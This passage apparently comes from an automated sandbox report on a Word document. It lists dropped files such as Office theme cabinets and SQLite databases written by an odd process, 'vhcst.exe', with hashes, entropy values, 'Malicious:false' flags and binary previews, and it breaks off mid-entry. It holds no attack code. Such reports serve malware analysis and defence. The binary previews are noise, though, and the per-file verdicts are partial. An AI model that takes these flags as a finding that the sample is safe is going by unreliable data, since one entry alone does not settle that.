                                                                                    Preview:MSCF.....x......D...............l............x..`?..........|...D..............M[. .content.inf...!........M[. .Damask.thmx...o.PI..[.............../.TU.jj0..3jCUPU.jF...m.UU.P}.....PU..*........w..#....E..].................A.. w.$..@..'g.......6%:..r9..d.M;M+.r.8[d{.s..dh..(P..........!.. ..ne..f.Nc..#..Y..q....KB}..b].@..F.&.t....E.........@&.m......$w......q...:.H....p.p.....?.9x.. .....?...ao....I....................o......g.u..;."....O;....{..(k..._.w/.Z......Jb..P.O?...........?....F....ty..72......! #....v..J......?.....!,.5.7..Em.....is.h.. \.H*)i1v..zwp.....P.....x].X{O//..\....Z>z....6...+..a.c...;.K..+...?014..p.w%o^.....]...MguF...`....r.S.......eF..):.dnk#.p{..<..{..Ym...>...H......x.}.hI..M....e......*G.&.?..~.~G6.....+...D..p...._...T....F6.[Cx./Q..Xe.>.;.}>.^..:..SB.X..2.......(A..&j9....\\.......Haf+]Y...$t^Y=........><.w....tL../E...%6.Vr~MI...l.....<.0.I....7.Q8y.f.uu...I.p..O..eYYS.O......9..Qo.......:..........o.............{

                                                                                    C:\Users\user\AppData\Local\Temp\cabF47C.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):2527736
                                                                                    Entropy (8bit):7.992272975565323
                                                                                    Encrypted:true
                                                                                    SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                                                                                    MD5:F256ACA509B4C6C0144D278C7036B0A8
                                                                                    SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                                                                                    SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                                                                                    SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                                                                                    Malicious:false
                                                                                    Preview:MSCF.....R&.....D............................R&.8?..............Z..............M). .content.inf..,........M). .Main_Event.thmx......R..[...............=.1.^xa..^...../..^x....QA^"....^/.I.{/F..F..........6Vn. ..._Hmc......<....#.{.@.....Xl../Y....Ye..'V.f.S.Vf.T..0t+..y...5O...{.....-.dT...........!...[ .ns..k.....QAA.. ....B..u.`.....{.\u8.0.....@t........K....@..w.......>...-1F...........1.E....O............_M.m..CP.O......X......g......].../..:C...Q...i.._"...M..1o...S../...9....k;...}S........y..;1o....1h......t.CL.3...].@...T...4.6.}.....M...f...[.s.."f....nZ.W......0.c.{.`.^..Oo.[.JT.2].^.f..a....kO......Q..G..s.5...V.Wj.....e...I,]...SHa..U.N.N.....v.C.....x..J{.Z.t...]WN...77BO-J......g......3:i..2..EFeL.,n..t:..,~4gt.w...M.5.'h.L..#..A&.O.ys%K.Z....F.PW..=jH...jGB.i..j.J.^.#.\n...J@.....-5.f.1jZ68.o...H2.......$O...>..ld&,#$.&_....yl.fkP$.........l....s....i.tx.~<.z...>..2.Gx..B..z.E.3.N<....`$.....b..?.w.[.X..1.=q!.s......v.......r.w

                                                                                    C:\Users\user\AppData\Local\Temp\cabF549.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):2591108
                                                                                    Entropy (8bit):7.999030891647433
                                                                                    Encrypted:true
                                                                                    SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                                                                                    MD5:BEB12A0464D096CA33BAEA4352CE800F
                                                                                    SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                                                                                    SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                                                                                    SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                                                                                    Malicious:false
                                                                                    Preview:MSCF.....D'.....D............................D'..D..........z...^..............M7. .content.inf............M7. .Mesh.thmx....&~j..[.....0.................]............ww,v.\....D......3m..m!f..0..E{..?..`..A...k.:....I..........|bmG.FS...f.;.J.vzb.......R.......-....|.......ESD.....".4M..M..t.N....y..,..#.4.5.2.......'.8.Q..3.D..T....!.......&rJg...s........(..9........Dw..'....9.-..G.c............E.. .O.....a..O.._..s..)7Wz~....bJ..D...o....0..R/.#...?.......~6.Q?....?y...g.?............TP..r-...>....-..!.6...B.....\../...2....4...p$...Oge.G.?.....S.#x(..$.A~.U.%f....dJ..S.f{.g.._..3{.fm2.....Z.\o&.[k.m....ko.8..r.-.Go.OQ..'!6..f.L...Ud.$.q*.L.....R.. J.T&4g...7.2K...#k.[.].:....lk.....;c..DRx.`..&L..cpv*.>.Ngz~.{..v5.\...'C.<R:.C8.|.fE{......K...).....T...gz}..rF..Q.dof7.....D.f=cm...U|.O.]F...5zg(.. ....S..._?D....^..+.i...Z.....+X..U!4qy..._..`I..>./.W.7......=.O....BG..=..%9|...3.?...}.$"..H..u...0.......a..:t?.....8...Z..#g.=<.e.`\......KQ..U....

                                                                                    C:\Users\user\AppData\Local\Temp\cabF933.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):3256855
                                                                                    Entropy (8bit):7.996842935632312
                                                                                    Encrypted:true
                                                                                    SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                                                                                    MD5:8867BDF5FC754DA9DA6F5BA341334595
                                                                                    SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                                                                                    SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                                                                                    SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                                                                                    Malicious:false
                                                                                    Preview:MSCF....Gm1.....D...............cM..........Gm1..D..............o... ..........MP. .content.inf...7. ......MP. .Vapor_Trail.thmx..n...N..[......L........7...+I..x...P7/...BH..Rm.\yqi.x..B....{.m.............=.....p.%.@......BpV.[......C.4..X./..Y.'SB..........0.Gr.FG.).....R\...2..Jt..1..._.4_B..................cn7H.-.....Q...1..G{G.~.. '.$......@.(....=@=..`....@.@.A. ....'.4`. .@....D...'....S.s..9.7" /....?.aY.c.........LG....k...?_.....P.....?.1.....FB..m..t...['......:...?...W..../~..z.Tr...X.@...._....3..N..p.....b...t.....^..t...~..t.8A...t_....D..3R.Z.=..{.A.8).3-5..v.isz....0A~%.s.D.4....k.K......8......)R.}f.E..n.g&:W...'E....4%T..>......b.y..[..zI....e...j.s....F.....|7826U.C.,..BY.U.F.f......"..#.m..,..._...#.\.....gPP.2.}Kas......g..3.d0.Z.Z.]..n......MY]6.....].m..D.6...?.n.20.,.#...S...JK..#.W.%.Z4.....i..CBf...../..z......n.N...U.....8t...ny...=.!..#..SF..e...1.P..@.Qx*.f.;..t..S.>..... F..)...@.Y..5j....x....vI.mM....Z.W..77...

                                                                                    C:\Users\user\AppData\Local\Temp\cabFA2F.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):3417042
                                                                                    Entropy (8bit):7.997652455069165
                                                                                    Encrypted:true
                                                                                    SSDEEP:98304:1YYkj2mRz6vkkB15AW4QD0ms+FdniD60bDUpS:qYkj7d6vP7NZDLn+PM8
                                                                                    MD5:749C3615E54C8E6875518CFD84E5A1B2
                                                                                    SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
                                                                                    SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                                                                                    SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                                                                                    Malicious:false
                                                                                    Preview:MSCF......3.....L.............................3..?..............j.....3.....t.4.............Insight design set.dotx.................Content.inf...QJ.N..[.........R.....L....N).J|E.B.$.B).3,...n.....JW....k.U1..M...3#.5....$^.....;vR...Z.nj...#......^*......a.{..(..o.v...!L`...T.-&jZ`.\.*0.....G.."b.m..F.X......$>%..?.D..H.l.j....$.......MrQ......q-....hx...6.D.3...j....n..U#R..3....sm?..xJr..............$G8..t.g...?.g.}......$P._...7.#..w..9DR....*lu....?..'.Ai..v.vl..`......B..N_....W./.;...c=oYW.lL'bv.......+...9.P..B=...*Y.SX=EL.5o....?H.e|.Fn.M[...d.v.....i......9..U..H....uq.Nrn..@..e...3....8.....s8}z..$........B....26...d..?.l....=.aeM.[..|n....H.;..7A.`....=.F...V.Y.l..8.........%e.x0S.....~..2..%.....U..#.r_.0V.v.6w.l.......Y.........v..o+....*sn.$^'.Il...akUU....w....~.....&8.Vwj.....Q.uQ..&..G.($.2.s.?m.B.~j.*..+G.W..qi..g..5.)){O........o.ow.(;.{...y;n...J...&.F2.@.;......[{'w..........`....czW.........?W...}..w....x..........

                                                                                    C:\Users\user\AppData\Local\Temp\fo2FhBPJL6hY7YS

                                                                                    Download File
                                                                                    Process:C:\7037005\vhcst.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                    Category:dropped
                                                                                    Size (bytes):49152
                                                                                    Entropy (8bit):0.8180424350137764
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\uSbBLfFhIO6EyIF

                                                                                    Download File
                                                                                    Process:C:\7037005\vhcst.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                    Category:dropped
                                                                                    Size (bytes):40960
                                                                                    Entropy (8bit):0.8553638852307782
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\~DF598DEB2FDF4DB363.TMP

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):512
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3::
                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                    Malicious:false
                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):30
                                                                                    Entropy (8bit):1.2389205950315936
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:33nz1:
                                                                                    MD5:80537FCE085F264F43C782C455A3A46A
                                                                                    SHA1:8DDBA8A5F7A2833E86503FC01B57373F30C74037
                                                                                    SHA-256:9F34A87A5BC18AEA989A80222B023BA8E5C9C84D18971B36AA8F05BEC82C7388
                                                                                    SHA-512:73C9E539421B7C184CCDA425CD18958374412463FD96ED9C3FD4CEC948DC73B0FBE6A733005093946AFAF64007CE32130C860E90BEB96D9940335F887FEDC3F0
                                                                                    Malicious:false
                                                                                    Preview:..............................

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\5QnwxSJVyX.LNK

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Nov 26 02:19:10 2024, mtime=Tue Nov 26 02:19:27 2024, atime=Tue Nov 26 02:19:22 2024, length=46592, window=hide
                                                                                    Category:dropped
                                                                                    Size (bytes):515
                                                                                    Entropy (8bit):4.722558418389798
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:4xtQl3cQabxce8PeXw/e/QOQJljAl68xmwvQP91FWnlOQSqdGmHavGmZp/t:8GoceHg2NQrjA6IIP91FGQQSqLHBmV
                                                                                    MD5:C55A5BA5FBD6FC7A354733CA7297C215
                                                                                    SHA1:E06E8D3AB09C80751693F5F05604E27AFD90468F
                                                                                    SHA-256:B432578908A68E1FB8FA7AB0336CBE593E401F61F55494FB8D0CAD657709F1FD
                                                                                    SHA-512:74BF63823C0046D5B6DFFF589FF98D04C428E3A9A809D8DE18B72D10A6308CFEA5870CF032C959A201BC32100B2152BC2D49424727853F2EA0BF3572A4AB5C77
                                                                                    Malicious:false
                                                                                    Preview:L..................F.... ........?..b....?..y.D..?..........................l.j.2.....zYl. .5QNWXS~1.DOC..N......zYf.zYl.....h........................5.Q.n.w.x.S.J.V.y.X...d.o.c.......T...............-.......S............F.......C:\Users\user\Desktop\5QnwxSJVyX.doc..%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.5.Q.n.w.x.S.J.V.y.X...d.o.c.`.......X.......980108...........hT..CrF.f4... .S.T..b...,.......hT..CrF.f4... .S.T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Directory, ctime=Tue Nov 26 02:19:24 2024, mtime=Tue Nov 26 02:20:34 2024, atime=Tue Nov 26 02:20:34 2024, length=0, window=hide
                                                                                    Category:dropped
                                                                                    Size (bytes):1164
                                                                                    Entropy (8bit):4.666822457064467
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:8XGOVOR9re6t+9zxTwIQAAmuTqTi8rqyFm:8WOVOjm9V5duTg8yF
                                                                                    MD5:C17DB391A91B285027759CE6F5DBE5B5
                                                                                    SHA1:1579D34A962EA7661100DAE01926EB9F4B15B788
                                                                                    SHA-256:28949BF66895C04BEE62E7B39C63ED76795689B1494158E34AD7C4C714877231
                                                                                    SHA-512:89EFE2D7D05F2604A65546DD80CBF9171A5BAE586FD390C6133D5D1598558CCA067FECFD33CF2CD457E18B642B24C8EC3710DAEC0D1594C7F2B792726F4E2F10
                                                                                    Malicious:false
                                                                                    Preview:L..................F........C.0..?.....'.?.....'.?..........................[....P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwHzYe.....................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....zYi...user.<......CW.^zYk............................,..j.o.n.e.s.....V.1.....CW.^..AppData.@......CW.^zYe............................%..A.p.p.D.a.t.a.....V.1.....zYi...Roaming.@......CW.^zYi...........................+...R.o.a.m.i.n.g.....\.1.....zYs...MICROS~1..D......CW.^zYs............................x..M.i.c.r.o.s.o.f.t.....\.1.....zYu...TEMPLA~1..D......zYm.zYu...............................T.e.m.p.l.a.t.e.s.......a...............-.......`............F.......C:\Users\user\AppData\Roaming\Microsoft\Templates........\.....\.T.e.m.p.l.a.t.e.s...........................>.e.L.:..er.=....`.......X.......980108...........hT..CrF.f4... ...c.....,.......hT..CrF.f4... ...c.....,..................1SPS.XF.L8C....&.m.q............/...S

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Generic INItialization configuration [folders]
                                                                                    Category:dropped
                                                                                    Size (bytes):71
                                                                                    Entropy (8bit):4.9032190425466835
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:M1QiI9dzVom4F5I9dzVopnbJlv:MaP9d5F9d5iv
                                                                                    MD5:46EF05A72470349B38AD93051C1C7B27
                                                                                    SHA1:9B5C8BB22B0E228050E422D0D2947238DF6476D4
                                                                                    SHA-256:D954003599867F4EE19D10BB5FC535C38D557B0DD4BE6938F181D2996CC5F2EE
                                                                                    SHA-512:9ED41734F42BC805A9FFBFB8246792383998A166B0946066AD46D214AAB283A66407B372C7C00BDE3EB2EB46010CC2D7870B10FEB1D7708EDAECB2EEB6512104
                                                                                    Malicious:false
                                                                                    Preview:[doc]..5QnwxSJVyX.LNK=0..[folders]..5QnwxSJVyX.LNK=0..Templates.LNK=0..

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):562113
                                                                                    Entropy (8bit):7.67409707491542
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                    MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                    SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                    SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                    SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                    Malicious:false
                                                                                    Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):1649585
                                                                                    Entropy (8bit):7.875240099125746
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                    MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                    SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                    SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                    SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                    Malicious:false
                                                                                    Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):558035
                                                                                    Entropy (8bit):7.696653383430889
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                    MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                    SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                    SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                    SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                    Malicious:false
                                                                                    Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):570901
                                                                                    Entropy (8bit):7.674434888248144
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                    MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                    SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                    SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                    SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                    Malicious:false
                                                                                    Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):523048
                                                                                    Entropy (8bit):7.715248170753013
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                    MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                    SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
